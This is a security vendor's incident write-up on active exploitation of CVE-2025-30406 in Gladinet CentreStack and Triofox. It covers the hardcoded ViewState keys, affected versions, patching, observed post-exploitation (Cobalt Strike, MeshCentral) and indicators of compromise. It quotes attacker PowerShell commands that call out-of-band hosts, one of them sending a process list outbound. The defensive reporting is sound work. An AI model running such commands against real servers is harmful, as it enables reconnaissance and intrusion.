Special thanks to Craig Sweeney, Hayden Drummond, Michael Tigges, Tanner Filip, Jevon Ang, Jamie Dumas, Stephanie Fairless, and Lindsey Welch for their contributions and support for this writeup.
On Friday, 11 April 2025, the 杏吧传媒 SOC received an alert from one of our own internal detectors known to catch 0-day exploitation.聽
Figure 1: Process Tree of the Powershell Payload Originating from the IIS Worker Process
While this is a simple detection to see suspicious outbound connections from an irregular child process, it indicates there may be more to uncover against the software served by the web service worker.
In this case, the suspect software was Gladinet CentreStack, which was just recently added to CISA鈥檚 Known Exploited Vulnerabilities database with CVE-2025-30406. At the time of writing, 杏吧传媒 has seen seven different organizations compromised via this attack vector.
Figure 2: Drill Down into the Command Line of w3wp.exe
Figure 3: Screenshot of CISA鈥檚 Notification of CVE-2025-30406
There are a few hundred vulnerable servers exposed to the public Internet according to Shodan. While this may be a relatively small number, the risk of immediate compromise is still severe.聽
Figure 4: Screenshot of Shodan Showing Effected Versions of CentreStack
It is very important to note that this weakness also affects Gladinet , up to version 16.4.10317.56372. By default, previous versions of the Triofox software have the same hardcoded cryptographic keys in their configuration file, and can be easily abused for remote code execution.
Per the , this 9.0 critical severity vulnerability pertains to hardcoded keys set in by default in the CentreStack and Triofox configuration files.聽
Figure 5: Screenshot of MITRE鈥檚 Description of CWE-321 / CVE-2025-30406
The CentreStack web portal is an ASPX application and uses the typical web.config file, which we have seen within the most common installation path:
C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
We have also seen a web.config file at this path:
C:\Program Files (x86)\Gladinet Cloud Enterprise\portal\web.config
This weakness can be leveraged to abuse the ASPX ViewState, a mechanism used to preserve the state of a web page and its controls between multiple HTTP requests. The hardcoded keys open the door for a very standard and well-researched attack technique with ViewState deserialization.
To be clear, there may be two web.config files (one in root\ and one in 辫辞谤迟补濒袄听directories) as this is a very common setup in ASP.NET applications. There is a root web app, and nested sub-applications.
To patch or mitigate the risk, if both web.config files are present, both must have updated machineKey values or the portal\web.config machineKey can be removed. The official Gladinet updates the root\web.config file but removes the machineKey entry from portal\web.config. This is a very important nuance because all configuration files must make sure they do not use the default hardcoded key value in order to be fully protected.
If a Gladinet CentreStack or Triofox server is exposed to the Internet with these hardcoded keys, it is in immediate danger and needs to be patched or have the machineKey values changed as soon as possible. CVE-2025-30406 is known to be actively exploited by threat actors, and this 9.0 critical severity issue has no 鈥減rerequisites鈥 other than knowing the default key values. Exploitation leads to remote code execution as the IISAPPPOOL\portaluser, which can easily escalate privileges to NT AUTHORITY\SYSTEM and fully compromise the target server.
For previous versions of Triofox servers, the web.config files have been found at these file paths within the installation directory as appropriate:
C:\Program Files (x86)\Triofox\root\web.config
C:\Program Files (x86)\Triofox\portal\web.config
杏吧传媒 security researchers have recreated a proof-of-concept exploit to demonstrate the effects of this vulnerability.
The minimum patched version of Gladinet CentreStack is 16.4.10315.56368. All versions below, including 16.1.10296.56315 and prior, are vulnerable with the hardcoded machineKey values as default. Triofox is patched at version 16.4.10317.56372, with all versions below vulnerable.
Gladinet has provided their own official security advisory and remediation guidance for both CentreStack and Triofox:
CentreStack:
If you are unable to patch by upgrading to the latest version, it is imperative that at a minimum you change your machineKey values with the process outlined in their guide.聽
杏吧传媒 has prepared this PowerShell script as a convenience for you to check if you are vulnerable. Run this snippet on a server running Gladinet CentreStack or Triofox:
To streamline the process of changing your machineKey, we have also prepared this PowerShell script to generate a new decryption key and validation key in your web.config file. This automates the minimum work needed to be protected against this vulnerability:
Using these two scripts, you should very easily be able to evaluate your risk against CVE-2025-30406, mitigate, and then re-evaluate to ensure you are protected.
To search across the 杏吧传媒 partner base, we observed the default autorun configured by the Gladinet CentreStack software: a Windows service running by the GladinetCloudMonitor.exe binary in the root of installation folder. At the time writing, we have seen the software on approximately 120 endpoints, with 7 unique organizations affected by exploitation of the vulnerability.
The earliest known indicators of compromise within the 杏吧传媒 partner base occurred at 2025-04-11 16:59:44 UTC (shown above in Figure 1). This was a test of reliable code execution:
powershell.exe聽 Invoke-WebRequest -Uri http://REDACTED.oastify.com/REDACTED
To check for successful exploitation, look for ViewState errors within the Windows Application Event Log around the time of exploitation with Event ID 1316.
Decoding the Base64 found in the event log will reveal the command attempted to be executed on the host.
杏吧传媒 has also observed other Out-of-Band Requests prior to post-exploitation to confirm connectivity to unpatched servers.
powershell.exe聽 Invoke-WebRequest -Uri http://REDACTED.oast.fun -Method POST -Body $(tasklist)
Something to note is the similarities in tradecraft with these discovery commands and a cluster of activity exploiting the recent CrushFTP vulnerability in our recent blog: CVE-2025-31161 Auth Bypass and Post-Exploitation.
杏吧传媒 has also observed threat actors attempting to use encoded PowerShell to download and sideload a DLL via a commonly used cradle technique:
This Centre.exe executable, likely named after the vulnerability, is a renamed 鈥淲allpaper Engine Launcher鈥 from Kristjan Skutta originally named launcher.exe. It should also be noted that the d3d11.dll file is the same file previously reported in our recent CrushFTP blog, as well.聽 This highlights how quickly threat actors can pivot to leverage new vulnerabilities, but that their post attack methods don鈥檛 necessarily have to change in order to be effective.
The Centre.exe process was removed by Windows Defender within minutes with the following Threat Name:聽
Behavior:Win32/CobaltStrike.H!sms
Across all pertinent incidents, the Centre.exe executable connected to these IP addresses:
104.21.16[.]1
104.21.48[.]1
Threat actors have also been observed performing lateral movement and performing installation of remote access tooling, namely MeshCentral. A host within an organization had not been onboarded to 杏吧传媒 at the time of exploitation and resulted in lateral movement to another endpoint.
On the second host (that was running the 杏吧传媒 agent), we observed default Impacket PowerShell commands were run to perform various enumeration commands, install the MeshCentral remote access tool MeshAgent, and execute the previously discussed renamed launcher.exe binary (Centre.exe).
The MeshCentral agent connects to rtb[.]mftadsrvr[.]com, with the same IP as the Centre.exe connection.
While a public proof-of-concept is not yet available, we will refrain from sharing further technical details and our own internal proof-of-concept. You can see example effects from exploitation with a video demonstration below:
We don鈥檛 have any intentions of sharing the proof-of-concept to embolden other adversaries, but once an external exploit is shared publicly we will update this blog to include the technical details of recreating the attack script.
We can confirm the Gladinet CentreStack and Triofox patches are effective in stopping exploitation from our tested proof-of-concept.
杏吧传媒 has identified ~120 endpoints running the Gladinet CentreStack software across our partner base.聽
Our team is sending email notifications and thorough outreach to partners running the Gladinet CentreStack and Triofox software to urge them to patch or mitigate CVE-2025-30406. The PowerShell scripts above and resources below in this blog post should arm you to test, detect, and mitigate against this vulnerability.
We have prepared this Sigma detector to alert on the code execution effects of CVE-2025-30406:
Additionally, we have developed a Chainsaw rule to enable easy detection within Windows Event Logs thanks to WithSecure鈥檚 phenomenal Chainsaw utility. The WithSecure team has spent significant time and effort previously while 杏吧传媒 has made -- we are very grateful for their collaboration.
If you think you could be impacted, take advantage of our trial to quickly discover any artifacts left behind.
Indicator |
First Observed聽 |
Description |
d3d11.dll 48产006肠产17别75别肠诲产707诲肠40诲诲654蹿449产94补产别49蹿97补808产35肠补产肠补1肠5蹿补产产蹿听 |
2025-04-12 |
Cobalt Strike (?) |
Centre.exe 30981d4082b58704d12a376c3cbb12fecb8a36c2bce64666315e26aef21e75c2 |
2025-04-12 |
Wallpaper Engine Launcher |
launcher.exe |
2025-04-12 |
Original filename for Centre.exe |
165.227.7[.]206 |
2025-04-11 |
Attacker IP Address |
104.21.16[.]1 |
2025-04-12 |
Attacker IP Address |
104.21.48[.]1 |
2025-04-12 |
Attacker IP Address |
2.58.56[.]16 |
2025-04-12 |
Attacker IP Address (also observed in CrushFTP exploitation) |
Behavior:Win32/CobaltStrike.H!sms | 2025-04-12 | Windows Defender Detection |
45.84.107[.]76 |
2025-04-13 |
Attacker IP Address |
Get insider access to 杏吧传媒 tradecraft, killer events, and the freshest blog updates.